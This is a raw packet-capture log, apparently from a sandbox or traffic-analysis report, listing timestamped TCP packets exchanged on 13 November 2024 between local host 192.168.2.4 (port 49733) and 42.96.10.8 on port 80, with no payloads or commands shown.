                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592268944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592272043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592288971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592293978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592304945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592320919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592333078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592366934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592384100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592396975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592397928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592412949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592422962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592430115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592444897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592446089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592462063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592477083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592489958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592494011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592511892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592525959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592542887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592580080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592597961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592613935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592643023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592647076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592663050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592688084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592713118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592727900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592744112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592758894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592763901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592775106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592786074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592792034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592808008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592823029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592828989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592840910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592849970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592856884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592866898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592922926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592938900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592952967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592967033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592969894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592986107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.592989922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593002081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593015909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593050003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593064070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593077898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593095064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593101978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593101978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593117952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593128920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593135118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593149900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593182087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593185902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593199968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593214035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593230009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593244076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593244076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593274117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593307972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593322992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593338013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593349934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593353987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593374014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593386889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593394995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593416929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593452930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593468904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593483925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593498945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593501091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593518019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593524933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593534946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593549013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593549967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593565941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593581915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593596935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593601942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593617916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593786001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593801975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593816996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593831062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593832970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593848944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593862057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593871117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593878031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593880892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593904018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593915939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593919992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593946934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593950987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593962908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593978882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593993902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.593998909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594011068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594026089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594038010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594049931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594062090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594067097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594084978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594099998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594113111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594116926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594136000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594145060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594149113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594167948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594217062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594234943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594254971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594255924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594273090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594286919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594289064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594304085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594319105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594331026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594335079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594351053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594352961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594367027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594392061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594393015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594409943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594424963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594425917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594443083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594455957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594461918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594471931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594485998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594489098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594531059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594729900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594744921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594759941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594774008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594799995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594815969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594830990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594847918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594856977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594868898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594876051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594913006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594914913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594930887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594947100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594970942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594971895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.594988108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595006943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595012903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595029116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595042944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595067024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595071077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595087051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595089912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595104933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595122099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595136881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595149040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595153093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595165014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595175982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595191002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595191956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595207930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595231056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595237970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595247984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595262051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595264912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595282078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595297098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595319033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595325947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595340014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595345020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595360994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595377922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595402002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595406055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595417976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595428944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595434904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595455885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595469952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595472097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595489979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595496893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595504999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595530987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595531940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595544100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595565081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595571041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595587969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595607042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595617056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595623016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595638990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595652103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595655918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595670938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595674992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595688105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595705032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595719099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595721006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595736027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595738888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595752001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595767975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595776081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595784903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.595803022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597542048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597611904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597628117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597645044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597645998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597667933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597670078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597687006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597703934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597727060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597744942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597748995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597765923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597790956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597805977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597806931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597825050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597839117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597839117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597868919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.597995043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598011971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598026991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598047972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598052979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598068953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598084927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598092079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598102093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598119020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598197937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598213911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598228931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598242998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598254919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598270893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598272085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598289013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598310947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598314047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598330021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598345041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598347902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598365068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598381042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598392963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598397017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598411083 CET4973380192.168.2.442.96.10.8
